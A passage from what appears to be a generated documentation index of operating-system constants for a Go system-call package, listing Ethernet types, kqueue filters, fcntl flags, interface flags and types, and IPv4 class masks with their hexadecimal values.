ETHERTYPE_NETBEUI (line 424) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NHRP (line 425) | ETHERTYPE_NHRP = 0x2001 constant ETHERTYPE_NOVELL (line 426) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 427) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 428) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 429) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NSH (line 430) | ETHERTYPE_NSH = 0x984f constant ETHERTYPE_NTRAILER (line 431) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 432) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 433) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 434) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PBB (line 435) | ETHERTYPE_PBB = 0x88e7 constant ETHERTYPE_PCS (line 436) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 437) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 438) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 439) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 440) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 441) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 442) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 443) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_QINQ (line 444) | ETHERTYPE_QINQ = 0x88a8 constant ETHERTYPE_RACAL (line 445) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 446) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 447) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 448) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 449) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 450) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 451) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 452) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 453) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 454) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 455) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 456) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 457) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 458) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 459) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 460) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOW (line 461) | ETHERTYPE_SLOW = 0x8809 constant ETHERTYPE_SNA (line 462) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 463) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 464) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 465) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 466) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 467) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 468) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 469) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 470) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 471) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 472) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 473) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 474) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 475) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 476) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 477) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 478) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 479) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 480) | ETHERTYPE_UBDL = 0x7000 constant ETHERTYPE_UBNIU (line 481) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 482) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 483) | ETHERTYPE_VALID = 0x1600 constant ETHERTYPE_VARIAN (line 484) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 485) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 486) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 487) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 488) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 489) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 490) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 491) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 492) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 493) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 494) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 495) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 496) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 497) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 498) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 499) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 500) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 501) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 502) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 503) | ETHER_ADDR_LEN = 0x6 constant ETHER_ALIGN (line 504) | ETHER_ALIGN = 0x2 constant ETHER_CRC_LEN (line 505) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 506) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 507) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 508) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_DIX_LEN (line 509) | ETHER_MAX_DIX_LEN = 0x600 constant ETHER_MAX_HARDMTU_LEN (line 510) | ETHER_MAX_HARDMTU_LEN = 0xff9b constant ETHER_MAX_LEN (line 511) | ETHER_MAX_LEN = 0x5ee constant ETHER_MIN_LEN (line 512) | ETHER_MIN_LEN = 0x40 constant ETHER_TYPE_LEN (line 513) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 514) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 515) | EVFILT_AIO = -0x3 constant EVFILT_DEVICE (line 516) | EVFILT_DEVICE = -0x8 constant EVFILT_EXCEPT (line 517) | EVFILT_EXCEPT = -0x9 constant EVFILT_PROC (line 518) | EVFILT_PROC = -0x5 constant EVFILT_READ (line 519) | EVFILT_READ = -0x1 constant EVFILT_SIGNAL (line 520) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 521) | EVFILT_SYSCOUNT = 0x9 constant EVFILT_TIMER (line 522) | EVFILT_TIMER = -0x7 constant EVFILT_VNODE (line 523) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 524) | EVFILT_WRITE = -0x2 constant EVL_ENCAPLEN (line 525) | EVL_ENCAPLEN = 0x4 constant EVL_PRIO_BITS (line 526) | EVL_PRIO_BITS = 0xd constant EVL_PRIO_MAX (line 527) | EVL_PRIO_MAX = 0x7 constant EVL_VLID_MASK (line 528) | EVL_VLID_MASK = 0xfff constant EVL_VLID_MAX (line 529) | EVL_VLID_MAX = 0xffe constant EVL_VLID_MIN (line 530) | EVL_VLID_MIN = 0x1 constant EVL_VLID_NULL (line 531) | EVL_VLID_NULL = 0x0 constant EV_ADD (line 532) | EV_ADD = 0x1 constant EV_CLEAR (line 533) | EV_CLEAR = 0x20 constant EV_DELETE (line 534) | EV_DELETE = 0x2 constant EV_DISABLE (line 535) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 536) | EV_DISPATCH = 0x80 constant EV_ENABLE (line 537) | EV_ENABLE = 0x4 constant EV_EOF (line 538) | EV_EOF = 0x8000 constant EV_ERROR (line 539) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 540) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 541) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 542) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 543) | EV_SYSFLAGS = 0xf800 constant EXTA (line 544) | EXTA = 0x4b00 constant EXTB (line 545) | EXTB = 0x9600 constant EXTPROC (line 546) | EXTPROC = 0x800 constant FD_CLOEXEC (line 547) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 548) | FD_SETSIZE = 0x400 constant FLUSHO (line 549) | FLUSHO = 0x800000 constant F_DUPFD (line 550) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 551) | F_DUPFD_CLOEXEC = 0xa constant F_GETFD (line 552) | F_GETFD = 0x1 constant F_GETFL (line 553) | F_GETFL = 0x3 constant F_GETLK (line 554) | F_GETLK = 0x7 constant F_GETOWN (line 555) | F_GETOWN = 0x5 constant F_ISATTY (line 556) | F_ISATTY = 0xb constant F_OK (line 557) | F_OK = 0x0 constant F_RDLCK (line 558) | F_RDLCK = 0x1 constant F_SETFD (line 559) | F_SETFD = 0x2 constant F_SETFL (line 560) | F_SETFL = 0x4 constant F_SETLK (line 561) | F_SETLK = 0x8 constant F_SETLKW (line 562) | F_SETLKW = 0x9 constant F_SETOWN (line 563) | F_SETOWN = 0x6 constant F_UNLCK (line 564) | F_UNLCK = 0x2 constant F_WRLCK (line 565) | F_WRLCK = 0x3 constant HUPCL (line 566) | HUPCL = 0x4000 constant HW_MACHINE (line 567) | HW_MACHINE = 0x1 constant ICANON (line 568) | ICANON = 0x100 constant ICMP6_FILTER (line 569) | ICMP6_FILTER = 0x12 constant ICRNL (line 570) | ICRNL = 0x100 constant IEXTEN (line 571) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 572) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 573) | IFAN_DEPARTURE = 0x1 constant IFF_ALLMULTI (line 574) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 575) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 576) | IFF_CANTCHANGE = 0x8e52 constant IFF_DEBUG (line 577) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 578) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 579) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 580) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 581) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 582) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 583) | IFF_NOARP = 0x80 constant IFF_OACTIVE (line 584) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 585) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 586) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 587) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 588) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 589) | IFF_STATICARP = 0x20 constant IFF_UP (line 590) | IFF_UP = 0x1 constant IFNAMSIZ (line 591) | IFNAMSIZ = 0x10 constant IFT_1822 (line 592) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 593) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 594) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 595) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 596) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 597) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 598) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 599) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 600) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 601) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 602) | IFT_ASYNC = 0x54 constant IFT_ATM (line 603) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 604) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 605) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 606) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 607) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 608) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 609) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 610) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 611) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 612) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BLUETOOTH (line 613) | IFT_BLUETOOTH = 0xf8 constant IFT_BRIDGE (line 614) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 615) | IFT_BSC = 0x53 constant IFT_CARP (line 616) | IFT_CARP = 0xf7 constant IFT_CCTEMUL (line 617) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 618) | IFT_CEPT = 0x13 constant IFT_CES (line 619) | IFT_CES = 0x85 constant IFT_CHANNEL (line 620) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 621) | IFT_CNR = 0x55 constant IFT_COFFEE (line 622) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 623) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 624) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 625) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 626) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 627) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 628) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 629) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 630) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 631) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 632) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 633) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 634) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 635) | IFT_DS3 = 0x1e constant IFT_DTM (line 636) | IFT_DTM = 0x8c constant IFT_DUMMY (line 637) | IFT_DUMMY = 0xf1 constant IFT_DVBASILN (line 638) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 639) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 640) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 641) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 642) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 643) | IFT_ECONET = 0xce constant IFT_ENC (line 644) | IFT_ENC = 0xf4 constant IFT_EON (line 645) | IFT_EON = 0x19 constant IFT_EPLRS (line 646) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 647) | IFT_ESCON = 0x49 constant IFT_ETHER (line 648) | IFT_ETHER = 0x6 constant IFT_FAITH (line 649) | IFT_FAITH = 0xf3 constant IFT_FAST (line 650) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 651) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 652) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 653) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 654) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 655) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 656) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 657) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 658) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 659) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 660) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 661) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 662) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 663) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 664) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 665) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 666) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 667) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 668) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 669) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 670) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 671) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 672) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 673) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 674) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 675) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 676) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 677) | IFT_HSSI = 0x2e constant IFT_HY (line 678) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 679) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 680) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 681) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 682) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 683) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 684) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 685) | IFT_IFGSN = 0x91 constant IFT_IMT (line 686) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 687) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 688) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 689) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 690) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 691) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 692) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 693) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 694) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 695) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 696) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 697) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 698) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 699) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 700) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 701) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 702) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 703) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 704) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 705) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 706) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 707) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 708) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 709) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 710) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 711) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 712) | IFT_LAPB = 0x10 constant IFT_LAPD (line 713) | IFT_LAPD = 0x4d constant IFT_LAPF (line 714) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 715) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 716) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 717) | IFT_LOOP = 0x18 constant IFT_MBIM (line 718) | IFT_MBIM = 0xfa constant IFT_MEDIAMAILOVERIP (line 719) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 720) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 721) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 722) | IFT_MODEM = 0x30 constant IFT_MPC (line 723) | IFT_MPC = 0x71 constant IFT_MPLS (line 724) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 725) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 726) | IFT_MSDSL = 0x8f constant IFT_MVL (line 727) | IFT_MVL = 0xbf constant IFT_MYRINET (line 728) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 729) | IFT_NFAS = 0xaf constant IFT_NSIP (line 730) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 731) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 732) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 733) | IFT_OTHER = 0x1 constant IFT_P10 (line 734) | IFT_P10 = 0xc constant IFT_P80 (line 735) | IFT_P80 = 0xd constant IFT_PARA (line 736) | IFT_PARA = 0x22 constant IFT_PFLOG (line 737) | IFT_PFLOG = 0xf5 constant IFT_PFLOW (line 738) | IFT_PFLOW = 0xf9 constant IFT_PFSYNC (line 739) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 740) | IFT_PLC = 0xae constant IFT_PON155 (line 741) | IFT_PON155 = 0xcf constant IFT_PON622 (line 742) | IFT_PON622 = 0xd0 constant IFT_POS (line 743) | IFT_POS = 0xab constant IFT_PPP (line 744) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 745) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 746) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 747) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 748) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 749) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 750) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 751) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 752) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 753) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 754) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 755) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 756) | IFT_PVC = 0xf2 constant IFT_Q2931 (line 757) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 758) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 759) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 760) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 761) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 762) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 763) | IFT_RS232 = 0x21 constant IFT_RSRB (line 764) | IFT_RSRB = 0x4f constant IFT_SDLC (line 765) | IFT_SDLC = 0x11 constant IFT_SDSL (line 766) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 767) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 768) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 769) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 770) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 771) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 772) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 773) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 774) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 775) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 776) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 777) | IFT_SONETVT = 0x33 constant IFT_SRP (line 778) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 779) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 780) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 781) | IFT_STARLAN = 0xb constant IFT_T1 (line 782) | IFT_T1 = 0x12 constant IFT_TDLC (line 783) | IFT_TDLC = 0x74 constant IFT_TELINK (line 784) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 785) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 786) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 787) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 788) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 789) | IFT_ULTRA = 0x1d constant IFT_USB (line 790) | IFT_USB = 0xa0 constant IFT_V11 (line 791) | IFT_V11 = 0x40 constant IFT_V35 (line 792) | IFT_V35 = 0x2d constant IFT_V36 (line 793) | IFT_V36 = 0x41 constant IFT_V37 (line 794) | IFT_V37 = 0x78 constant IFT_VDSL (line 795) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 796) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 797) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 798) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 799) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 800) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 801) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 802) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 803) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 804) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 805) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 806) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 807) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 808) | IFT_VOICEOVERIP = 0x68 constant IFT_WIREGUARD (line 809) | IFT_WIREGUARD = 0xfb constant IFT_X213 (line 810) | IFT_X213 = 0x5d constant IFT_X25 (line 811) | IFT_X25 = 0x5 constant IFT_X25DDN (line 812) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 813) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 814) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 815) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 816) | IFT_XETHER = 0x1a constant IGNBRK (line 817) | IGNBRK = 0x1 constant IGNCR (line 818) | IGNCR = 0x80 constant IGNPAR (line 819) | IGNPAR = 0x4 constant IMAXBEL (line 820) | IMAXBEL = 0x2000 constant INLCR (line 821) | INLCR = 0x40 constant INPCK (line 822) | INPCK = 0x10 constant IN_CLASSA_HOST (line 823) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 824) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 825) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 826) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 827) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 828) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 829) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 830) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 831) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 832) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 833) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 834) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 835) | IN_CLASSD_NET = 